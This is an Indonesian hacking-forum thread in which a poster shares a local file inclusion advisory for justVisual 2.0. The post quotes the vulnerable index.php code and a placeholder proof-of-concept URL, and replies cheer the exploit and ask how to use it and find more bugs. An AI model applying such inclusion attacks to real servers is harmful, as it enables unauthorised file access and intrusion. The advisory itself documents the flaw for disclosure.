Threaded Mode | Linear Mode

***eidelweiss*** · 03-29-2010, 10:54 AM

Original file or Ref# can be check or see here

- http://xforce.iss.net/xforce/xfdb/57174
- http://secunia.com/advisories/39093
- http://www.securityfocus.com/bid/38970
- http://www.exploit-db.com/exploits/11876

#########################################################################

[+]Title: justVisual 2.0 (index.php) Local File Vulnerability
[+]Version: 2.0
[+]License: http://www.gnu.org/copyleft/gpl.html
[+]Download: http://fh54.de/justVisual/packages/justVisual2.zip
[+]Risk: Medium
[+]Local: Yes
[-]Remote: No

###########################################################

###########################################################

-=[ VULN CODE ]=-

=[www/index.php]=

$selfname=basename($_SERVER['PHP_SELF'],'.php');
if(isset($_GET['p']) && !empty($_GET['p'])) {
//$selfname=basename($_GET['p'],'.php');
$selfname=str_replace('.php','',$_GET['p']);

-=[ P0C ]=

Http://127.0.0.1/index.php?p=[LFI]

###############################=[E0F]=###################################

xnagac0de · 04-03-2010, 02:21 PM

mantepp om gimana cara gunainnya...????
maklum newbie.....

***ketek*** · (This post was last modified: 04-03-2010 02:46 PM by ketek.)

sip om eidelweiss... ane salut sama om.
thx udah berbagi ilmu

exploitnya tokcer...

bisa include file dengan ekstensi php semaunya
tpi klo mw include file dengan ektensi lainnya di server harus -> magic_quote = off
gitu ya om ^^

te- o- pe-
btw produktif banget nih om...
bole tau tips and trick nyari vuln???

ditunggu exploit berikutnya

ziel · 04-03-2010, 06:33 PM

waduh....dijelasin dong om ketek....coz ana ga nyambung sma skali om....

***ian182*** · 04-03-2010, 06:48 PM

mantep dah tu exploit.php bisa semua:-bd.btw cara nyari yang vuln gimane om?dicari atu atu?

cancer · 04-03-2010, 07:02 PM

wah bingung ane.....

***eidelweiss*** · 04-04-2010, 05:17 AM

@cancer: k4n ud4h 4da P0C (Proof Of Concept) d4h complete k4lau nd4k sal4h 1tu m4h :)

@ian182 : w3w ian182 y6 asl1 nd4k n1ch y4ch ( if original mah0k l0e , p4 k4bar om

)

@om Ketek : w4h om s4tu in1 m3rendah t3rus ~_~

akatsuchi · 04-05-2010, 08:01 AM

manteb om..
dicobain yah bugs nya

***eidelweiss*** · 04-05-2010, 08:54 AM

s1lahkan

btw act1ve jg yach si om akatsuchi..
g1la kag3t gu3..
pag1" gu3 l1at ud4h h4mpir 60% thr3at di comment (pagi" j4m 7:30)

seneng

akatsuchi · 04-05-2010, 09:10 AM

huhuhuhuhu
this is my third home after HN
iseng aja om ...
sambil ngurusi IRC sambil maen2 ke forum

salam kenal om eidelweiss ^_^
silahkan berkunjung ke IRC ( HN-Community.Byroe.net )

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	DOS ip pada local area dengan ettercap	dxfandy19	11	162	04-21-2013 02:19 PM Last Post: ghosthands
	CMS Balitbang - CSRF/XSS Vulnerability	nuxbie_cyber	7	351	04-19-2013 09:12 PM Last Post: paijocode
	[Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload	Regel	11	673	02-02-2013 12:19 AM Last Post: copaker21
	Butuh Local Exploit Kernel Server	AnonymousOpsID	2	164	11-24-2012 08:37 PM Last Post: AnonymousOpsID
	#DiyWeb Admin Bypass dan Remote file/shell Upload exploit	AnonymousOpsID	4	337	11-06-2012 05:07 PM Last Post: rock_me
	[Tutor] Sistem Biwes Multiple Vulnerability	eidelweiss	10	259	09-01-2012 10:09 AM Last Post: Super Moderator
	kernel-2.6.18-164 2010 Local Root Exploit	numlock	5	342	08-11-2012 11:37 PM Last Post: d4rk_kn19ht
	CMS Schoolhos - Remote Arbitrary File Upload	nuxbie_cyber	10	347	06-28-2012 06:47 PM Last Post: Loex
	CMS DMS-Easy - Multiple Vulnerability	nuxbie_cyber	6	166	06-23-2012 09:15 PM Last Post: chiboga
	RevolutionTechnologies - SQL Injection Vulnerability	nuxbie_cyber	6	220	06-14-2012 11:20 AM Last Post: Anonymous33